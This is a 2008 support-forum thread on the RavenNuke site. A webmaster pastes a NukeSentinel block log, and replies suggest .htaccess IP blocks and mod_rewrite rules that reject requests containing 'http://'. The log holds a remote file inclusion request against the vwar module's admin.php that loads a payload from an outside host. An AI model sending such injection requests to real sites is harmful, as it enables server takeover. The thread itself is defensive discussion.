PHP Web Host - Quality Web Hosting For All PHP Applications Free RavenNuke(tm) Add Ons
  Login or Register
 • Home • Downloads • Your Account • Forums • 

View next topic
View previous topic


Google
 
Web RavenPHPScripts (This Site)
Post new topic   Reply to topic
Author Message
bugsTHoR
Involved
Involved


Joined: Apr 05, 2006
Posts: 252

PostPosted: Mon Dec 15, 2008 9:38 am Reply with quote Back to top

i keep geting a certain medical site blocked which is great for sentinel and me Smile

the thing is i noticed its port number would change and then it would try again which im not worried as sentinel is saving me the work lol

but how do i stop my hotmail inbox geting spammed by the notices

ie: block the hack bot or whatever it is perminently using the IP and port.

or would it be easier for me to install the killer templates to kill there server lol
View user's profile Send private message Visit poster's website
bugsTHoR
Involved
Involved


Joined: Apr 05, 2006
Posts: 252

PostPosted: Mon Dec 15, 2008 9:39 am Reply with quote Back to top

this is the last one they used on me

Created By: NukeSentinel(tm) 2.6.01
Date & Time: 2008-12-14 16:42:09 GMT GMT +0000
Blocked IP: 64.18.142.194
User ID: Anonymous (1)
Reason: Abuse-Filter
--------------------
Referer: none
User Agent: Mozilla/5.0
HTTP Host:
Only registered users can see links on this board!
Get registered or login to the forums!

Script Name: /modules.php
Query String: name=vwar&file=war //modules/vwar/admin/admin.php?vwar_root=http://uploader.ws/upload/200812/FX29ID1.txt??
Get String: name=vwar&file=war //modules/vwar/admin/admin.php?vwar_root=http://uploader.ws/upload/200812/FX29ID1.txt??
Post String: Not Available
Forwarded For: none
Client IP: none
Remote Address: 64.18.142.194
Remote Port: 43622
Request Method: GET
View user's profile Send private message Visit poster's website
jakec
Site Admin


Joined: Feb 06, 2006
Posts: 3028
Location: United Kingdom

PostPosted: Mon Dec 15, 2008 12:09 pm Reply with quote Back to top

Has the IP been added to the .htaccess file?

As long as the IP is blocked and doesn't change it should then be blocked by the server and not trigger Sentinel.
View user's profile Send private message
evaders99
Former Moderator in Good Standing


Joined: Apr 30, 2004
Posts: 3221

PostPosted: Mon Dec 15, 2008 11:06 pm Reply with quote Back to top

Note that these are standard automated attempts to hack your site. Botnets don't care if you have defense or not, or even if you are using the vulnerable script. They will attempt and move on. Things like the PC killer script won't generally work because they load nothing into a browser... they just point, shoot, and move on.

There are ways to block generic remote file injection attacks at the server level, but generally all sites have to live with it. There isn't anything you can do but keep your scripts up-to-date and secure.
View user's profile Send private message Visit poster's website
slackervaara
Worker
Worker


Joined: Aug 26, 2007
Posts: 234

PostPosted: Tue Dec 16, 2008 11:12 pm Reply with quote Back to top

This in .htaccess should stop these hack attempts prior Sentinel and thus stop e-mails:

RewriteEngine On


RewriteCond %{THE_REQUEST} .*http:\/\/.* [OR]
RewriteCond %{THE_REQUEST} .*http%3A%2F%2F.*
RewriteRule ^.* - [F]
View user's profile Send private message
Display posts from previous:       
Post new topic   Reply to topic

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
Forums ©
 

All logos and trademarks in this site are property of their respective owner.
The comments are property of their posters, all the rest © 2002-2011 by Raven

You can syndicate our news using the file xml

CSE HTML Validator Helped Clean up This Page! [Valid RSS] valid RSS 2.0 Valid robots.txt Stop Spam Harvesters, Join Project Honey Pot

Website engines core code is © copyright by PHP-Nuke but has been heavily patched and modified by myself and others.
PHP-Nuke is a free software released under the GNU/GPL.


:: fisubice phpbb2 style by Daz :: PHP-Nuke theme by www.nukemods.com ::
:: fisubice Theme Modified by the RavenNuke™ Team ::

:: W3C CSS Compliance Validation :: W3C HTML 4.01 Transitional Compliance Validation ::

zerosum